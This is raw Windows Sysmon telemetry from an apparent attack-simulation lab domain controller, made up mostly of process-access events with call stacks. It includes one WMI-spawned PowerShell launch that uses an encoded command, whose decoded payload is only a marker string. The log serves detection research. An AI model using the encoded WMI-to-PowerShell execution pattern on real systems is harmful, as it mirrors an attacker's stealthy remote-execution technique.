16:53:44.575{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D98-603E-9DAA-00000000AD01}9756C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\wbem\cimwin32.dll+3adce|C:\Windows\system32\wbem\cimwin32.dll+3d475|C:\Windows\system32\wbem\cimwin32.dll+3ab15|C:\Windows\system32\wbem\cimwin32.dll+3b393|C:\Windows\system32\wbem\cimwin32.dll+3bb40|C:\Windows\SYSTEM32\framedynos.dll+20256|C:\Windows\SYSTEM32\framedynos.dll+218b5|C:\Windows\system32\wbem\wmiprvse.exe+1704a|C:\Windows\system32\wbem\wmiprvse.exe+1724f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4 154100x80000000000000002238770Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.579{05ADC7E1-6D98-603E-9DAA-00000000AD01}9756C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell.exe /NoProfile /Encode VwByAGkAdABlAC0ASABvAHMAdAAgADIAOAA3ADgAYwBiADUAMQAtAGMAYgBhAGEALQA0ADQAMwA4AC0AYgA1AGQAMQAtADYAMQBjADIAMgBkADMAZAA1AGYAZgBjAA==C:\Windows\system32\ATTACKRANGE\Administrator{05ADC7E1-29F1-6039-B11D-350000000000}0x351db12HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{05ADC7E1-6D63-603E-6BAA-00000000AD01}6344C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding 10341000x80000000000000002238769Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.569{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-6D98-603E-9BAA-00000000AD01}10560C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002238768Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.545{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D98-603E-9CAA-00000000AD01}13052C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238767Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.545{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D98-603E-9BAA-00000000AD01}10560C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238766Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.545{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D98-603E-9AAA-00000000AD01}6340C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238765Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.545{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D98-603E-99AA-00000000AD01}11584C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238764Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.545{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D98-603E-98AA-00000000AD01}10664C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238763Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.545{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D98-603E-97AA-00000000AD01}13564C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238762Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.545{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CB1-603E-35AA-00000000AD01}14828C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238761Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.545{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CB1-603E-34AA-00000000AD01}11696C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238760Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.545{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CAF-603E-33AA-00000000AD01}8188C:\Windows\system32\DllHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238759Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.545{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238758Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.545{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238757Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.545{05ADC7E1-229D-6039-0B00-00000000AD01}852892C:\Windows\system32\lsass.exe{05ADC7E1-6D98-603E-99AA-00000000AD01}11584C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002238756Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.545{05ADC7E1-229D-6039-0B00-00000000AD01}852892C:\Windows\system32\lsass.exe{05ADC7E1-6D98-603E-99AA-00000000AD01}11584C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002238755Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.545{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238754Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.545{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238753Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.545{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238752Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.545{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238751Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.545{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.d